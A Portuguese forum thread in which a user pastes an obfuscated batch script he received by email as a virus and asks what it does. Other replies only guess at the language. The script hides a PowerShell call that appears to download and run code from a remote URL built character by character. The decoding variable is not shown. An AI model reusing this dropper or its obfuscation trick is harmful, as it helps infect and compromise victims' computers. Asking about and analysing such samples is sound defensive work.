Virus via linha de comando

desenho128 · Abril 5, 2018, 7:00pm

Olá Galera sou formado analista de sistemas mas trabalho com infra. Gosto muito de programar e ja criei algumas soluções para automatizar. Hoje recebi por e-mail um tentativa de vírus um arquivo com linhas de comando via cmd e uma linguagem bem estranha fiquei curioso não sei se pode postar as linhas de comando aqui mas fiquei curioso para saber oq essas linhas fazem.

xF=^s^P^o
set SmjiGCDZ=^wer
set xLZuG=Sh^e
set bSUgpo=ll^
set bkvG=v^1.
set LivMFyrH=0^\po
set Rde=we
set NINJhGtJ=^rsh
set oxZg=el^l
set nBuMFdVg=^.^ex
set SKqwa=^e ^-n
set IzaGWJ=^op^
set CZR=^-^w
set xkO=^in ^1 -
set date=%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~49,1%(^"%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~2,1%(%vneewQAa:~40,1%%vneewQAa:~20,1%%vneewQAa:~16,1%-%vneewQAa:~24,1%%vneewQAa:~37,1%%vneewQAa:~53,1%%vneewQAa:~20,1%%vneewQAa:~55,1%%vneewQAa:~1,1% %vneewQAa:~40,1%%vneewQAa:~15,1%%vneewQAa:~36,1%.%vneewQAa:~22,1%%vneewQAa:~15,1%%vneewQAa:~37,1%%vneewQAa:~12,1%%vneewQAa:~35,1%%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~50,1%%vneewQAa:~36,1%).%vneewQAa:~32,1%%vneewQAa:~24,1%%vneewQAa:~22,1%%vneewQAa:~40,1%%vneewQAa:~35,1%%vneewQAa:~24,1%%vneewQAa:~3,1%%vneewQAa:~32,1%%vneewQAa:~52,1%%vneewQAa:~36,1%%vneewQAa:~61,1%%vneewQAa:~44,1%%vneewQAa:~50,1%%vneewQAa:~6,1%(’%vneewQAa:~27,1%%vneewQAa:~1,1%%vneewQAa:~1,1%%vneewQAa:~11,1%%vneewQAa:~52,1%://%vneewQAa:~32,1%%vneewQAa:~35,1%%vneewQAa:~17,1%.%vneewQAa:~42,1%%vneewQAa:~15,1%%vneewQAa:~55,1%%vneewQAa:~28,1%%vneewQAa:~32,1%%vneewQAa:~28,1%.%vneewQAa:~55,1%%vneewQAa:~8,1%%vneewQAa:~17,1%/?%vneewQAa:~32,1%%vneewQAa:~17,1%%vneewQAa:~61,1%%vneewQAa:~41,1%%vneewQAa:~52,1%%vneewQAa:~34,1%%vneewQAa:~16,1%%vneewQAa:~20,1%%vneewQAa:~56,1%%vneewQAa:~38,1%%vneewQAa:~44,1%%vneewQAa:~21,1%%vneewQAa:~25,1%%vneewQAa:~11,1%%vneewQAa:~1,1%%vneewQAa:~13,1%%vneewQAa:~15,1%%vneewQAa:~10,1%%vneewQAa:~11,1%%vneewQAa:~57,1%%vneewQAa:~36,1%%vneewQAa:~54,1%%vneewQAa:~12,1%%vneewQAa:~18,1%%vneewQAa:~41,1%%vneewQAa:~11,1%%vneewQAa:~61,1%%vneewQAa:~15,1%%vneewQAa:~7,1%%vneewQAa:~36,1%%vneewQAa:~21,1%%vneewQAa:~37,1%%vneewQAa:~49,1%%vneewQAa:~57,1%%vneewQAa:~36,1%%vneewQAa:~17,1%%vneewQAa:~33,1%%vneewQAa:~16,1%%vneewQAa:~22,1%%vneewQAa:~36,1%%vneewQAa:~54,1%%vneewQAa:~29,1%%vneewQAa:~51,1%%vneewQAa:~52,1%%vneewQAa:~12,1%%vneewQAa:~44,1%%vneewQAa:~14,1%%vneewQAa:~2,1%%vneewQAa:~3,1%%vneewQAa:~39,1%%vneewQAa:~21,1%%vneewQAa:~45,1%%vneewQAa:~39,1%%vneewQAa:~22,1%%vneewQAa:~8,1%%vneewQAa:~50,1%%vneewQAa:~32,1%%vneewQAa:~45,1%%vneewQAa:~10,1%%vneewQAa:~58,1%%vneewQAa:~61,1%%vneewQAa:~24,1%%vneewQAa:~18,1%%vneewQAa:~52,1%%vneewQAa:~24,1%%vneewQAa:~18,1%%vneewQAa:~24,1%%vneewQAa:~19,1%%vneewQAa:~45,1%%vneewQAa:~42,1%%vneewQAa:~45,1%%vneewQAa:~37,1%%vneewQAa:~24,1%%vneewQAa:~16,1%%vneewQAa:~43,1%%vneewQAa:~42,1%%vneewQAa:~14,1%%vneewQAa:~40,1%%vneewQAa:~36,1%%vneewQAa:~47,1%%vneewQAa:~44,1%%vneewQAa:~6,1%%vneewQAa:~5,1%%vneewQAa:~3,1%%vneewQAa:~5,1%%vneewQAa:~8,1%%vneewQAa:~7,1%%vneewQAa:~22,1%%vneewQAa:~39,1%%vneewQAa:~48,1%D%vneewQAa:~10,1%%vneewQAa:~9,1%/%vneewQAa:~16,1%%vneewQAa:~42,1%%vneewQAa:~44,1%%vneewQAa:~31,1%%vneewQAa:~5,1%%vneewQAa:~37,1%%vneewQAa:~39,1%%vneewQAa:~7,1%%vneewQAa:~59,1%%vneewQAa:~10,1%%vneewQAa:~7,1%%vneewQAa:~52,1%%vneewQAa:~14,1%%vneewQAa:~8,1%%vneewQAa:~45,1%%vneewQAa:~30,1%%vneewQAa:~8,1%%vneewQAa:~47,1%’)^");
echo %%date%% | %RfWMWHWs%%WrG%%xF%%SmjiGCDZ%%xLZuG%%bSUgpo%%bkvG%%LivMFyrH%%Rde%%NINJhGtJ%%oxZg%%nBuMFdVg%%SKqwa%%IzaGWJ%%CZR%%xkO%

darlan_machado · Abril 6, 2018, 12:26pm

Eu não consigo reconhecer, mas, me parece algo como batch ou shell script (a propensão a ser batch é muito maior).

desenho128 · Abril 7, 2018, 11:02am

desenho128:

set date=%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~49,1%(^"%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~2,1%(%vneewQAa:~40,1%%vneewQAa:~20,1%%vneewQAa:~16,1%-%vneewQAa:~24,1%%vneewQAa:~37,1%%vneewQAa:~53,1%%vneewQAa:~20,1%%vneewQAa:~55,1%%vneewQAa:~1,1% %vneewQAa:~40,1%%vneewQAa:~15,1%%vneewQAa:~36,1%.%vneewQAa:~22,1%%vneewQAa:~15,1%%vneewQAa:~37,1%%vneewQAa:~12,1%%vneewQAa:~35,1%%vneewQAa:~44,1%%vneewQAa:~15,1%%vneewQAa:~50,1%%vneewQAa:~36,1%).%vneewQAa:~32,1%%vneewQAa:~24,1%%vneewQAa:~22,1%%vneewQAa:~40,1%%vneewQAa:~35,1%%vneewQAa:~24,1%%vneewQAa:~3,1%%vneewQAa:~32,1%%vneewQAa:~52,1%%vneewQAa:~36,1%%vneewQAa:~61,1%%vneewQAa:~44,1%%vneewQAa:~50,1%%vneewQAa:~6,1%(’%vneewQAa:~27,1%%vneewQAa:~1,1%%vneewQAa:~1,1%%vneewQAa:~11,1%%vneewQAa:~52,1%://%vneewQAa:~32,1%%vneewQAa:~35,1%%vneewQAa:~17,1%.%vneewQAa:~42,1%%vneewQAa:~15,1%%vneewQAa:~55,1%%vneewQAa:~28,1%%vneewQAa:~32,1%%vneewQAa:~28,1%.%vneewQAa:~55,1%%vneewQAa:~8,1%%vneewQAa:~17,1%/?%vneewQAa:~32,1%%vneewQAa:~17,1%%vneewQAa:~61,1%%vneewQAa:~41,1%%vneewQAa:~52,1%%vneewQAa:~34,1%%vneewQAa:~16,1%%vneewQAa:~20,1%%vneewQAa:~56,1%%vneewQAa:~38,1%%vneewQAa:~44,1%%vneewQAa:~21,1%%vneewQAa:~25,1%%vneewQAa:~11,1%%vneewQAa:~1,1%%vneewQAa:~13,1%%vneewQAa:~15,1%%vneewQAa:~10,1%%vneewQAa:~11,1%%vneewQAa:~57,1%%vneewQAa:~36,1%%vneewQAa:~54,1%%vneewQAa:~12,1%%vneewQAa:~18,1%%vneewQAa:~41,1%%vneewQAa:~11,1%%vneewQAa:~61,1%%vneewQAa:~15,1%%vneewQAa:~7,1%%vneewQAa:~36,1%%vneewQAa:~21,1%%vneewQAa:~37,1%%vneewQAa:~49,1%%vneewQAa:~57,1%%vneewQAa:~36,1%%vneewQAa:~17,1%%vneewQAa:~33,1%%vneewQAa:~16,1%%vneewQAa:~22,1%%vneewQAa:~36,1%%vneewQAa:~54,1%%vneewQAa:~29,1%%vneewQAa:~51,1%%vneewQAa:~52,1%%vneewQAa:~12,1%%vneewQAa:~44,1%%vneewQAa:~14,1%%vneewQAa:~2,1%%vneewQAa:~3,1%%vneewQAa:~39,1%%vneewQAa:~21,1%%vneewQAa:~45,1%%vneewQAa:~39,1%%vneewQAa:~22,1%%vneewQAa:~8,1%%vneewQAa:~50,1%%vneewQAa:~32,1%%vneewQAa:~45,1%%vneewQAa:~10,1%%vneewQAa:~58,1%%vneewQAa:~61,1%%vneewQAa:~24,1%%vneewQAa:~18,1%%vneewQAa:~52,1%%vneewQAa:~24,1%%vneewQAa:~18,1%%vneewQAa:~24,1%%vneewQAa:~19,1%%vneewQAa:~45,1%%vneewQAa:~42,1%%vneewQAa:~45,1%%vneewQAa:~37,1%%vneewQAa:~24,1%%vneewQAa:~16,1%%vneewQAa:~43,1%%vneewQAa:~42,1%%vneewQAa:~14,1%%vneewQAa:~40,1%%vneewQAa:~36,1%%vneewQAa:~47,1%%vneewQAa:~44,1%%vneewQAa:~6,1%%vneewQAa:~5,1%%vneewQAa:~3,1%%vneewQAa:~5,1%%vneewQAa:~8,1%%vneewQAa:~7,1%%vneewQAa:~22,1%%vneewQAa:~39,1%%vneewQAa:~48,1%D%vneewQAa:~10,1%%vneewQAa:~9,1%/%vneewQAa:~16,1%%vneewQAa:~42,1%%vneewQAa:~44,1%%vneewQAa:~31,1%%vneewQAa:~5,1%%vneewQAa:~37,1%%vneewQAa:~39,1%%vneewQAa:~7,1%%vneewQAa:~59,1%%vneewQAa:~10,1%%vneewQAa:~7,1%%vneewQAa:~52,1%%vneewQAa:~14,1%%vneewQAa:~8,1%%vneewQAa:~45,1%%vneewQAa:~30,1%%vneewQAa:~8,1%%vneewQAa:~47,1%’)^");

echo %%date%% | %RfWMWHWs%%WrG%%xF%%SmjiGCDZ%%xLZuG%%bSUgpo%%bkvG%%LivMFyrH%%Rde%%NINJhGtJ%%oxZg%%nBuMFdVg%%SKqwa%%IzaGWJ%%CZR%%xkO%

Estudei um pouco de batch e realmente se parece muito mas oq acho estranho e esse sequencia de carácteres separados por virgulas irreconhecíveis

Virus via linha de comando

Cursos de Mobile

Cursos de Programação

Cursos de Front-end

Cursos de DevOps

Cursos de Design & UX

Cursos de Business

Cursos de Data & BI